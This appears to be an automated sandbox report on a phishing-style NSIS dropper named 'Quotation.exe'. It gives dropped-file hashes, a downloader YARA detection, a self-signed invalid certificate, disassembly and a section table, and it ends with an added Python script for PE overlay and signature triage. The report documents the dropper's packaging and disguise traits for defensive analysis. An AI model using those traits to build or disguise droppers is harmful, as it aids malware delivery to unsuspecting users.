• Excluded domains from analysis (whitelisted): ris.api.iris.microsoft.com, spclient.wg.spotify.com, wdcpalt.microsoft.com, client.wns.windows.com, login.live.com, wdcp.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, arc.msn.com
• Report creation exceeded the maximum time and may be missing disassembly code information.
• Report size exceeded the maximum capacity and may be missing behavior information.
• Report size getting too big: too many NtEnumerateKey calls found.
• Report size getting too big: too many NtOpenKeyEx calls found.
• Report size getting too big: too many NtQueryValueKey calls found.
Process: C:\Users\user\Desktop\Quotation.exe
File Type: data
Category: dropped
Size (bytes): 261995
Entropy (8bit): 7.29610483044462
Encrypted: false
SSDEEP: 6144:od+8r4FkVd2EInntyLURcXLFL4t5qbHGSIBb:WRrHOnntQrXLN+qSSIZ
MD5: 258AEA53C2D4917537DC6E160ED83890
SHA1: 1E9D937187DA27F205D2E7052C4F875374564410
SHA-256: 078ABD959945A2DE0905D4FF7B7288291B19603BFE6EDA64986BE47313F2D26D
SHA-512: 254A5CAEC00C6A72CEAF83E1C7FDF6BCBB8B3B599EC679C4869FF93D91C06B6C6857A8BF7F450E2A984145DC2E70BA0F687E51A19A26A98C4D9360CD2797E7E5
Malicious: false
                                                                                                                        Process:C:\Users\user\Desktop\Quotation.exe
                                                                                                                        File Type:ASCII text, with very long lines (55032), with no line terminators
                                                                                                                        Category:dropped
                                                                                                                        Size (bytes):55032
                                                                                                                        Entropy (8bit):2.669891427410196
                                                                                                                        Encrypted:false
                                                                                                                        SSDEEP:768:iplrX/Vcn0/T7ADSEsfSKcFpWDAlJAhCieRTN3stuby6VVAkXnCrsiKmdQy7UElT:sTQnJCndT7SpBHC
                                                                                                                        MD5:6E31A03A1B956DF431E66A4360494661
                                                                                                                        SHA1:0236923F575AF0C82263CAD2C260859433C91E93
                                                                                                                        SHA-256:944E9D3BA3195866EA449AAAA1B10912847058836D4CE7D40FA321A926E5FA2E
                                                                                                                        SHA-512:12FF3A92BB2EE101B25455196D78EE7493594E9C68A6F781395FF69531D5F7BEEE915660E012E42107E8995F5C3AE6913471CF020F42F912437EC207D94EE9F7
                                                                                                                        Malicious:false
                                                                                                                        Preview:
                                                                                                                        Process:C:\Users\user\Desktop\Quotation.exe
                                                                                                                        File Type:PE32 executable (DLL) (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                        Category:dropped
                                                                                                                        Size (bytes):75248
                                                                                                                        Entropy (8bit):6.149004775364808
                                                                                                                        Encrypted:false
                                                                                                                        SSDEEP:1536:GmY7dQU8l75gS4SqQR27YZW1cwvbTxUd6Rw:GmacliS49QR27YZW1vn2dWw
                                                                                                                        MD5:3A03B61FA01DCDFF3E595D279F159D6E
                                                                                                                        SHA1:94900C28C23AD01D311C389A0813277CFB30345C
                                                                                                                        SHA-256:4F4D6511BEC955B4E8A30371ED743EA5EBC87CEB0BF93FE21F0A378AA2C05A01
                                                                                                                        SHA-512:0D04D3486911DFE0439449554E90FB68B4D85EEE025A9B89910C306DE33CBFDBBEF1ABCAC5D4CD3B3CC1B1F445B7C67DC341C9363C9B127810ABD0498EC94AC4
                                                                                                                        Malicious:false
                                                                                                                        Antivirus:
                                                                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........T..:..:..:....:.....:..;..:..]..:..]...:..]..:..]...:..u...:..u..:....:..u...:.Rich.:.........PE..L...w..U...........!.....:..........dG.......P...............................@.......p....@.................................<...P.... .......................0.......P..8............................R..@............P..............(Q..H............text...!8.......:.................. ..`.rdata......P.......>..............@..@.data...............................@....rsrc........ ......................@..@.reloc.. ....0......................@..B................................................................................................................................................................................................................................................................................................................
                                                                                                                        Process:C:\Users\user\Desktop\Quotation.exe
                                                                                                                        File Type:PE32+ executable (DLL) (console) x86-64 Mono/.Net assembly, for MS Windows
                                                                                                                        Category:dropped
                                                                                                                        Size (bytes):485488
                                                                                                                        Entropy (8bit):6.710350474742332
                                                                                                                        Encrypted:false
                                                                                                                        SSDEEP:6144:1E5AW+0VyAaOKxFf8r6S2rGjF0KAmdHCKsCZcufvh7OzxQxQ5JVIRVrk:KGWlaOKC2a0tmFChCOFeqLIRpk
                                                                                                                        MD5:84D7B1FB924AEEFCF4A2C7A687FE2EF1
                                                                                                                        SHA1:A2C2C7DE9096328A3FEF0C7FCEA262A294C0807B
                                                                                                                        SHA-256:32A54C24B18B3C087E06F4F19885FB410304AB4AF2263154020D3F5CDCE36D99
                                                                                                                        SHA-512:E75F91DA415B15CA0B19519179021FD88C0FC68FE4EF2A68B899B121BD511C04AECCB58101318C86CB0458D7310208C358DBB9155A02D62DE73C04128ECC5934
                                                                                                                        Malicious:false
                                                                                                                        Antivirus:
                                                                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d....fW..........." .........................................................`............`...@......@............... ...........................................1...D..p$...P.......0..T...............................................................H............text.............................. ..`.data...wy.......z..................@....reloc.......P.......:..............@..B............................................0...........................T.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O...................y.........?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0.....d...C.o.m.m.e.n.t.s...I.n.t.e.r.n.a.l. .i.m.p.l.e.m.e.n.t.a.t.i.o.n. .p.a.c.k.a.g.e. .n.o.t. .m.e.a.n.t. .f.o.r. .d.i.r.e.c.t. .c.o.n.s.u.m.p.t.i.o.n... .P.l.e.a.s.e. .d.o. .n.o.t. .r.e.f.e.r.e.
                                                                                                                        Process:C:\Users\user\Desktop\Quotation.exe
                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                        Category:dropped
                                                                                                                        Size (bytes):49768
                                                                                                                        Entropy (8bit):5.650496280667822
                                                                                                                        Encrypted:false
                                                                                                                        SSDEEP:768:4vuoy1c6A2ZX8TRNH5JVbOd502zq1TntV5fljM:4vuoO3ZX8Q5jzC35NjM
                                                                                                                        MD5:BCC32F5B608C99F89508921B6333B329
                                                                                                                        SHA1:5F70BB4A3A812C399D8D2A2954C9A715574CFF61
                                                                                                                        SHA-256:5D4FF9A8E3B3CA26F53CD2CC4C557C5F2074A431B9CD029AE7F7A7B8902FA3C1
                                                                                                                        SHA-512:99C7623BCA873C75A3B804C815DF178ACC88E043A36473C785216CD26DC73F0525FE336F17F0F2C8CA6473FBD407A953D4650D093C52440D93ECF07C1440FAB6
                                                                                                                        Malicious:true
                                                                                                                        Yara Hits:
                                                                                                                        • Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Ghetto\Delforliget\Melotragedy\Lindhardt\System.dll, Author: Joe Security
                                                                                                                        Antivirus:
                                                                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L................." ..0.................. ........... ....................................`.....................................O.......................h$.............T............................................ ............... ..H............text........ ...................... ..`.rsrc...............................@..@.reloc..............................@..B.......................H.......P ......................`.......................................BSJB............v4.0.30319......l...$;..#~...;...R..#Strings....4.......#US.8.......#GUID...H.......#Blob............T.........3................................/......................=.....=....J=...=......V...}.....h.. ..... ..... ..J.. ..... ..... ..... ..1.. ..j.. .., AF..a.AF.....R..e..=.................;.....;.....;..)..;..1..;..9..;..A..;..I..;..Q..;..Y..;..a..;..i..;..q..;..y..;.....; ....;.....;..
                                                                                                                        Process:C:\Users\user\Desktop\Quotation.exe
                                                                                                                        File Type:PE32+ executable (DLL) (console) x86-64 (stripped to external PDB), for MS Windows
                                                                                                                        Category:dropped
                                                                                                                        Size (bytes):36029
                                                                                                                        Entropy (8bit):5.699900454607003
                                                                                                                        Encrypted:false
                                                                                                                        SSDEEP:768:Hm5z53y6m/LHlM6GnPGUvMrsztd/sLLhF3VI:a53y6Gy6GuU5d/OhF3G
                                                                                                                        MD5:8A54723090530190EB11AFCD5B702B1B
                                                                                                                        SHA1:DFA923EC796A754BD21C4F9E504305848A4CB1B2
                                                                                                                        SHA-256:738F67F45FAA07CC387BAF390604EE4CE709CBE7C223D9A043EE06F7CB360D5B
                                                                                                                        SHA-512:E0D310458C8259112E07B153EDC86FDFF29E1B09648FED8D163D44DEB3BEE1545E7AD37BB00E9255DF6514844B21A829750848DA42F85FA77BEF376CE09750CF
                                                                                                                        Malicious:false
                                                                                                                        Antivirus:
                                                                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d...........<.....&".....R..........0..........h.....................................^........ .................................................................................`...............................(....................................................text...HP.......R..................`.P`.data........p.......V..............@.P..rdata...............X..............@.`@.pdata...............b..............@.0@.xdata...............j..............@.0@.bss.... .............................`..edata...............r..............@.0@.idata...............v..............@.0..CRT....X............~..............@.@..tls................................@.@..reloc..`...........................@.0B........................................................................................................................................................................
                                                                                                                        Process:C:\Users\user\Desktop\Quotation.exe
                                                                                                                        File Type:PE32+ executable (DLL) (console) x86-64 (stripped to external PDB), for MS Windows
                                                                                                                        Category:dropped
                                                                                                                        Size (bytes):130344
                                                                                                                        Entropy (8bit):6.2622011397185
                                                                                                                        Encrypted:false
                                                                                                                        SSDEEP:3072:tKInqqVjbm+1Vi5R6QQU7k1TAH1OobTrWHEE+jFpCOx:tVzjvi5R6QQU7k1TAH1OobTrWHExFpdx
                                                                                                                        MD5:2455841538BA8A502398C18781CC3CEB
                                                                                                                        SHA1:86CFD513FEE46EBC2C35225B27372679BE6ADA91
                                                                                                                        SHA-256:F37BE7BD8C46D58CA931810536C8A2BEC36D06FF3281740FE0AD177F022AC781
                                                                                                                        SHA-512:BC1DCDDE074150616DED7EAACC3FC44BDD2487EB5E550172F5EA46432AA76F19443A9FD6CEF61577B7803C1B083FFCBCEAF9ADC3114A97B547A78C2654F757E3
                                                                                                                        Malicious:false
                                                                                                                        Antivirus:
                                                                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d.................&"....."....................\d.............................P......z.....`... .................................................X....0..................x....@.............................. ..(.......................P............................text...8!......."..................`.P`.data........@.......&..............@.`..rdata...^...P...`...(..............@.`@.pdata..............................@.0@.xdata..............................@.0@.bss..................................`..edata..............................@.0@.idata..X...........................@.0..CRT....X...........................@.@..tls....h.... ......................@.`..rsrc........0......................@.0..reloc.......@......................@.0B................................................................................................................................
                                                                                                                        Process:C:\Users\user\Desktop\Quotation.exe
                                                                                                                        File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                        Category:dropped
                                                                                                                        Size (bytes):227256
                                                                                                                        Entropy (8bit):6.388677533277947
                                                                                                                        Encrypted:false
                                                                                                                        SSDEEP:6144:ue/rKQgYva3o4vj272BNvIJuQlf2qIHL2:uYrK4a3PvKw7ufg2
                                                                                                                        MD5:49A2E97304EF8E044EEBD7ACCAD37E11
                                                                                                                        SHA1:7D0F26591C8BD4CAB1718E323B65706CBEA5DE7A
                                                                                                                        SHA-256:83EAFBF165642C563CD468D12BC85E3A9BAEDE084E5B18F99466E071149FD15F
                                                                                                                        SHA-512:AC206C5EF6F373A0005902D09110A95A7F5FB4F524653D30C3A65182717272FE244694A6698D40884BEA243B2CA00D7741CED796DF7AE8C633F513B8C6FCD6C8
                                                                                                                        Malicious:false
                                                                                                                        Antivirus:
                                                                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                        Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d...J..b.........."......:.....................@....................................Y.....`..................................................................`..h....X..........................................(....P..............(...h............................text....9.......:.................. ..`.rdata.......P.......>..............@..@.data....!...0......................@....pdata..h....`.......*..............@..@.00cfg...............D..............@..@.tls.................F..............@....rsrc................H..............@..@.reloc...............P..............@..B........................................................................................................................................................................................................................................................................................................
                                                                                                                        Process:C:\Users\user\Desktop\Quotation.exe
                                                                                                                        File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                                                        Category:dropped
                                                                                                                        Size (bytes):102577
                                                                                                                        Entropy (8bit):5.075179901575448
                                                                                                                        Encrypted:false
                                                                                                                        SSDEEP:768:t9H5uXFjJeEoPsznZgkZNhFdS2E0fVnSdNPfZ5+uKIu7aQzTgp37CtHRMX6NX0:tJ5wJeEoU9g0Nhav09nahfYxDRx0
                                                                                                                        MD5:3144FDFEC817D0AC6FE3F4642B70328B
                                                                                                                        SHA1:756C3513DC10CF00B517C72B2D3AB3E20895A46C
                                                                                                                        SHA-256:BF17F5B38DCF35B55B1E0FAD462D4095ABAAA4CD8F1EDBDC8657C0249EF5D4D3
                                                                                                                        SHA-512:012D9A3B88BA5D5090E8B47B49FE50E518489AB05FAAC6A1A0743F29A369B7D67F39B8E113B34740607137F2D67D75116DBE2A76E8E1DBE699BA4973F8037684
                                                                                                                        Malicious:false
                                                                                                                        Antivirus:
                                                                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d...rL.`.<........& ...$.....6......P................................................U....`... .........................................Y....................P..................`............................A..(....................................................text...............................`.P`.data...p....0....... ..............@.P..rdata..p....@......."..............@.`@.pdata.......P.......*..............@.0@.xdata..l....`......................@.0@.bss.........p........................`..edata..Y............0..............@.0@.idata...............2..............@.0..CRT....X............6..............@.@..tls.................8..............@.@..reloc..`............:..............@.0B/4...................<..............@.PB/19.....C............@..............@..B/31..........`......................@..B/45.............. ..................@..B/57.....
                                                                                                                        Process:C:\Windows\SysWOW64\control.exe
                                                                                                                        File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 5, database pages 59, cookie 0x4f, schema 4, UTF-8, version-valid-for 5
                                                                                                                        Category:dropped
                                                                                                                        Size (bytes):122880
                                                                                                                        Entropy (8bit):1.1305327154874678
                                                                                                                        Encrypted:false
                                                                                                                        SSDEEP:192:oLt4nKTjebGAUJp/XH9euJDvphC+KRmquPWSTVumQ6:it4nsJp/39RDhw+KRmqu+cVumQ
                                                                                                                        MD5:D331C900DDE8ACB523C51D9448205C0A
                                                                                                                        SHA1:BDB3366F54876E78F76A6244EDA7A4C302FEB91D
                                                                                                                        SHA-256:F199798DF1C37E3A8F6FFF1E208F083CF687F5C6A220DCAD42BB68F2120181CD
                                                                                                                        SHA-512:415E4F4F26D4F861063676EA786C2941DB8DB7E248E32D84595BC7D531CE19669AFDCB447BC18B0B723839984CD15269FF6E89EBCD168D8EBD0EC7AF86CC92E7
                                                                                                                        Malicious:false
                                                                                                                        Preview:SQLite format 3......@ .......;...........O......................................................O}...........5........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
Process: C:\Users\user\Desktop\Quotation.exe
File Type: PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category: dropped
Size (bytes): 11776
Entropy (8bit): 5.854901984552606
Encrypted: false
SSDEEP: 192:qPtkiQJr7V9r3HcU17S8g1w5xzWxy6j2V7i77blbTc4U:F7VpNo8gmOyRsVc4
MD5: 0063D48AFE5A0CDC02833145667B6641
SHA1: E7EB614805D183ECB1127C62DECB1A6BE1B4F7A8
SHA-256: AC9DFE3B35EA4B8932536ED7406C29A432976B685CC5322F94EF93DF920FEDE7
SHA-512: 71CBBCAEB345E09306E368717EA0503FE8DF485BE2E95200FEBC61BCD8BA74FB4211CD263C232F148C0123F6C6F2E3FD4EA20BDECC4070F5208C35C6920240F0
Malicious: false
Antivirus:
• Antivirus: ReversingLabs, Detection: 0%
                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......ir*.-.D.-.D.-.D...J.*.D.-.E.>.D.....*.D.y0t.).D.N1n.,.D..3@.,.D.Rich-.D.........PE..L......]...........!..... ..........!).......0...............................`............@..........................2.......0..P............................P.......................................................0..X............................text............ .................. ..`.rdata..c....0.......$..............@..@.data...h....@.......(..............@....reloc..|....P.......*..............@..B................................................................................................................................................................................................................................................................................................................................................................................................
File type: PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
Entropy (8bit): 7.974128626441633
TrID:
• Win32 Executable (generic) a (10002005/4) 99.96%
• Generic Win/DOS Executable (2004/3) 0.02%
• DOS Executable Generic (2002/1) 0.02%
• Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name: Quotation.exe
File size: 693360
MD5: 8a81948116d2ea79bee1d261733dba89
SHA1: 5cf4113debe6d37bd770d8d3870647b8bac082a3
SHA256: 5a64a3fd65f7176b7ad623893e3cb573af13eb51850f8243a1951884eee757a9
SHA512: bc5707d66c79d3f01e29227514bc1fa938e0165b000b94efefdb3c8d2849e2ede859c037b103b9f85365cd178c179171e8e7dec071c71ba61b6e919d1eba8841
SSDEEP: 12288:QV5CSEuHKGQYpovMKcZnY4UKwp7hVOZCbgjvwf:QV51qFMccUNEZCbgjY
TLSH: 7BE42317B19382C3D5E749F53E698B3683B33F570D22878FF2AA37B19974914812A427
File Content Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........(...F...F...F.*.....F...G.w.F.*.....F...v...F...@...F.Rich..F.........PE..L......].................`..........52.......p....@
Icon Hash: 84c8c888cac88800
Entrypoint: 0x403235
Entrypoint Section: .text
Digitally signed: true (a signature is present; it does not validate, see Signature Valid below)
Imagebase: 0x400000
Subsystem: windows gui
Image File Characteristics: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
DLL Characteristics: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE (DYNAMIC_BASE is set, but with RELOCS_STRIPPED and an empty base-relocation directory the image cannot be rebased, so it loads at the preferred base 0x400000)
Time Stamp: 0x5DF6D4E3 [Mon Dec 16 00:50:43 2019 UTC] (link time of the prebuilt NSIS stub, more than two and a half years before the certificate's Not Before date; it does not date this build of the dropper)
TLS Callbacks:
CLR (.Net) Version:
OS Version Major: 4
OS Version Minor: 0
File Version Major: 4
File Version Minor: 0
Subsystem Version Major: 4
Subsystem Version Minor: 0
Import Hash: e9c0657252137ac61c1eeeba4c021000
Signature Valid: false
Signature Issuer: E=Hjertecenteret@Brahminee.Sta, OU="Slewingslews Styrborde Nadines ", O=Demystify, L=Parlier, S=California, C=US (identical to the subject below: the certificate is self-signed)
Signature Validation Error: A certificate chain processed, but terminated in a root certificate which is not trusted by the trust provider
Error Number: -2146762487 (0x800B0109, CERT_E_UNTRUSTEDROOT)
Not Before: 15/08/2022 02:11:02
Not After: 14/08/2025 02:11:02
Subject Chain
• E=Hjertecenteret@Brahminee.Sta, OU="Slewingslews Styrborde Nadines ", O=Demystify, L=Parlier, S=California, C=US
Version: 3
Thumbprint MD5: 62DE8C7E9FEEF9C1BE32A539EE8C3042
Thumbprint SHA-1: 3D54D8A3F7094698631D99D96688154B999E2C8B
Thumbprint SHA-256: A645406AC892515D81FC329AB84ADDF8C558F2770665B05F23CFC9F4C322D1DC
Serial: 3F5567173D0043C048AB0658FB8124DCFF6DDE12
                                                                                                                        Instruction
                                                                                                                        sub esp, 00000184h
                                                                                                                        push ebx
                                                                                                                        push esi
                                                                                                                        push edi
                                                                                                                        xor ebx, ebx
                                                                                                                        push 00008001h
                                                                                                                        mov dword ptr [esp+18h], ebx
                                                                                                                        mov dword ptr [esp+10h], 00409198h
                                                                                                                        mov dword ptr [esp+20h], ebx
                                                                                                                        mov byte ptr [esp+14h], 00000020h
                                                                                                                        call dword ptr [004070A0h]
                                                                                                                        call dword ptr [0040709Ch]
                                                                                                                        and eax, BFFFFFFFh
                                                                                                                        cmp ax, 00000006h
                                                                                                                        mov dword ptr [0042370Ch], eax
                                                                                                                        je 00007F5C392A7CB3h
                                                                                                                        push ebx
                                                                                                                        call 00007F5C392AAD9Bh
                                                                                                                        cmp eax, ebx
                                                                                                                        je 00007F5C392A7CA9h
                                                                                                                        push 00000C00h
                                                                                                                        call eax
                                                                                                                        mov esi, 00407298h
                                                                                                                        push esi
                                                                                                                        call 00007F5C392AAD17h
                                                                                                                        push esi
                                                                                                                        call dword ptr [00407098h]
                                                                                                                        lea esi, dword ptr [esi+eax+01h]
                                                                                                                        cmp byte ptr [esi], bl
                                                                                                                        jne 00007F5C392A7C8Dh
                                                                                                                        push 0000000Ah
                                                                                                                        call 00007F5C392AAD6Fh
                                                                                                                        push 00000008h
                                                                                                                        call 00007F5C392AAD68h
                                                                                                                        push 00000006h
                                                                                                                        mov dword ptr [00423704h], eax
                                                                                                                        call 00007F5C392AAD5Ch
                                                                                                                        cmp eax, ebx
                                                                                                                        je 00007F5C392A7CB1h
                                                                                                                        push 0000001Eh
                                                                                                                        call eax
                                                                                                                        test eax, eax
                                                                                                                        je 00007F5C392A7CA9h
                                                                                                                        or byte ptr [0042370Fh], 00000040h
                                                                                                                        push ebp
                                                                                                                        call dword ptr [00407040h]
                                                                                                                        push ebx
                                                                                                                        call dword ptr [00407284h]
                                                                                                                        mov dword ptr [004237D8h], eax
                                                                                                                        push ebx
                                                                                                                        lea eax, dword ptr [esp+38h]
                                                                                                                        push 00000160h
                                                                                                                        push eax
                                                                                                                        push ebx
                                                                                                                        push 0041ECC8h
                                                                                                                        call dword ptr [00407178h]
                                                                                                                        push 00409188h
                                                                                                                        Programming Language:
                                                                                                                        • [EXP] VC++ 6.0 SP5 build 8804
Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0x7430 | 0xa0 | .rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x36000 | 0x4568 | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0xa7228 | 0x2248 | (file offset, not an RVA; 0xa7228 + 0x2248 = 0xa9470 = 693360, the file size, so the Authenticode blob is the last thing in the overlay)
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0x7000 | 0x294 | .rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
Name | Virtual Address | Virtual Size | Raw Size | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
.text | 0x1000 | 0x5f7d | 0x6000 | False | 0.6680094401041666 | data | 6.466064816043304 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata | 0x7000 | 0x123e | 0x1400 | False | 0.4275390625 | data | 4.989734782278587 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data | 0x9000 | 0x1a818 | 0x400 | False | 0.638671875 | data | 5.130817636118804 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.ndata | 0x24000 | 0x12000 | 0x0 | False | 0 | empty | 0.0 | IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc | 0x36000 | 0x4568 | 0x4600 | False | 0.42265625 | data | 5.512282206254712 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
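The section table and the security directory together tell a triage analyst where the NSIS archive and the Authenticode blob sit in a file like this one. The script below is an added worked example, not code from the report or from Joe Sandbox: it parses a PE32's COFF header, data directories and section headers with nothing but the standard library, computes the overlay, checks whether the signature blob ends exactly at EOF, and looks for the NSIS first-header magic in the overlay. The synthetic PE it builds reuses the report's section sizes, security directory (0xa7228/0x2248), COFF characteristics, timestamp and 693360-byte file size; the PointerToRawData values (headers of 0x400, sections packed back to back), the placement of the NSIS header at the very start of the overlay, and the WIN_CERTIFICATE header fields are assumptions, since the report does not list them.

```python
"""Locate the overlay and the Authenticode blob of a PE32 file.

Added example (not from the Joe Sandbox report). The synthetic PE mirrors
the report's section table, security directory and file size; raw data
pointers and the NSIS header position are assumptions.
"""
import struct

IMAGE_DIRECTORY_ENTRY_SECURITY = 4
# NSIS "first header": siginfo 0xDEADBEEF (little-endian) followed by the magic string.
NSIS_FIRST_HEADER_MAGIC = b"\xef\xbe\xad\xdeNullsoftInst"


def parse_pe_layout(data: bytes) -> dict:
    """Return section raw extents, security directory and overlay bounds of a PE32 image."""
    if data[:2] != b"MZ":
        raise ValueError("missing MZ header")
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    if data[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("missing PE signature")
    coff = e_lfanew + 4
    _machine, nsec, _ts, _sym, _nsym, opt_size, _chars = struct.unpack_from("<HHIIIHH", data, coff)
    opt = coff + 20
    if struct.unpack_from("<H", data, opt)[0] != 0x10B:
        raise ValueError("only PE32 optional headers are handled here")
    # PE32: NumberOfRvaAndSizes at +92, data directories start at +96 (8 bytes each).
    ndirs = struct.unpack_from("<I", data, opt + 92)[0]
    sec_off, sec_size = 0, 0
    if ndirs > IMAGE_DIRECTORY_ENTRY_SECURITY:
        sec_off, sec_size = struct.unpack_from(
            "<II", data, opt + 96 + 8 * IMAGE_DIRECTORY_ENTRY_SECURITY)
    sections = []
    sect_hdr = opt + opt_size
    for i in range(nsec):
        name, vsize, va, raw_size, raw_ptr = struct.unpack_from("<8sIIII", data, sect_hdr + 40 * i)
        sections.append({"name": name.rstrip(b"\0").decode(), "va": va, "vsize": vsize,
                         "raw_ptr": raw_ptr, "raw_size": raw_size})
    # The overlay is everything after the last byte of mapped section data.
    overlay_start = max(s["raw_ptr"] + s["raw_size"] for s in sections)
    nsis = data.find(NSIS_FIRST_HEADER_MAGIC, overlay_start)
    return {
        "sections": sections,
        "overlay_start": overlay_start,
        "overlay_size": len(data) - overlay_start,
        # The SECURITY entry holds a file offset (not an RVA) to the WIN_CERTIFICATE blob.
        "security_offset": sec_off,
        "security_size": sec_size,
        "signature_at_eof": sec_size > 0 and sec_off + sec_size == len(data),
        "nsis_header_offset": nsis,  # -1 if no NSIS first header was found
    }


def build_sample_pe() -> bytes:
    """Constructed PE32 using the report's section sizes, security directory and file size."""
    file_size = 0xA9470                      # 693360 bytes, as in the report
    sec_off, sec_size = 0xA7228, 0x2248      # IMAGE_DIRECTORY_ENTRY_SECURITY from the report
    # (name, VirtualAddress, VirtualSize, SizeOfRawData, PointerToRawData, Characteristics)
    # Raw pointers are an assumption: 0x400 of headers, sections packed back to back.
    secs = [
        (b".text",  0x1000,  0x5F7D,  0x6000, 0x400,  0x60000020),
        (b".rdata", 0x7000,  0x123E,  0x1400, 0x6400, 0x40000040),
        (b".data",  0x9000,  0x1A818, 0x400,  0x7800, 0xC0000040),
        (b".ndata", 0x24000, 0x12000, 0x0,    0x0,    0xC0000080),
        (b".rsrc",  0x36000, 0x4568,  0x4600, 0x7C00, 0x40000040),
    ]
    img = bytearray(file_size)
    img[:2] = b"MZ"
    struct.pack_into("<I", img, 0x3C, 0x80)                  # e_lfanew
    img[0x80:0x84] = b"PE\0\0"
    coff = 0x84
    # Machine i386, 5 sections, the report's timestamp, PE32 optional header, characteristics 0x10F.
    struct.pack_into("<HHIIIHH", img, coff, 0x14C, len(secs), 0x5DF6D4E3, 0, 0, 0xE0, 0x10F)
    opt = coff + 20
    struct.pack_into("<H", img, opt, 0x10B)                  # PE32 magic
    struct.pack_into("<I", img, opt + 16, 0x3235)            # AddressOfEntryPoint
    struct.pack_into("<I", img, opt + 28, 0x400000)          # ImageBase
    struct.pack_into("<I", img, opt + 92, 16)                # NumberOfRvaAndSizes
    struct.pack_into("<II", img, opt + 96 + 8 * IMAGE_DIRECTORY_ENTRY_SECURITY, sec_off, sec_size)
    hdr = opt + 0xE0
    for i, (name, va, vsize, raw_size, raw_ptr, chars) in enumerate(secs):
        struct.pack_into("<8sIIIIIIHHI", img, hdr + 40 * i, name.ljust(8, b"\0"),
                         vsize, va, raw_size, raw_ptr, 0, 0, 0, 0, chars)
    # Assumed placement: NSIS first header at the start of the overlay.
    overlay = 0x7C00 + 0x4600
    img[overlay:overlay + len(NSIS_FIRST_HEADER_MAGIC)] = NSIS_FIRST_HEADER_MAGIC
    # WIN_CERTIFICATE header: dwLength, wRevision 0x0200, wCertificateType 0x0002 (PKCS#7).
    struct.pack_into("<IHH", img, sec_off, sec_size, 0x0200, 0x0002)
    return bytes(img)


if __name__ == "__main__":
    info = parse_pe_layout(build_sample_pe())
    for s in info["sections"]:
        print(f"{s['name']:<7} raw 0x{s['raw_ptr']:06x}+0x{s['raw_size']:05x}")
    print(f"overlay starts at 0x{info['overlay_start']:x}, {info['overlay_size']} bytes")
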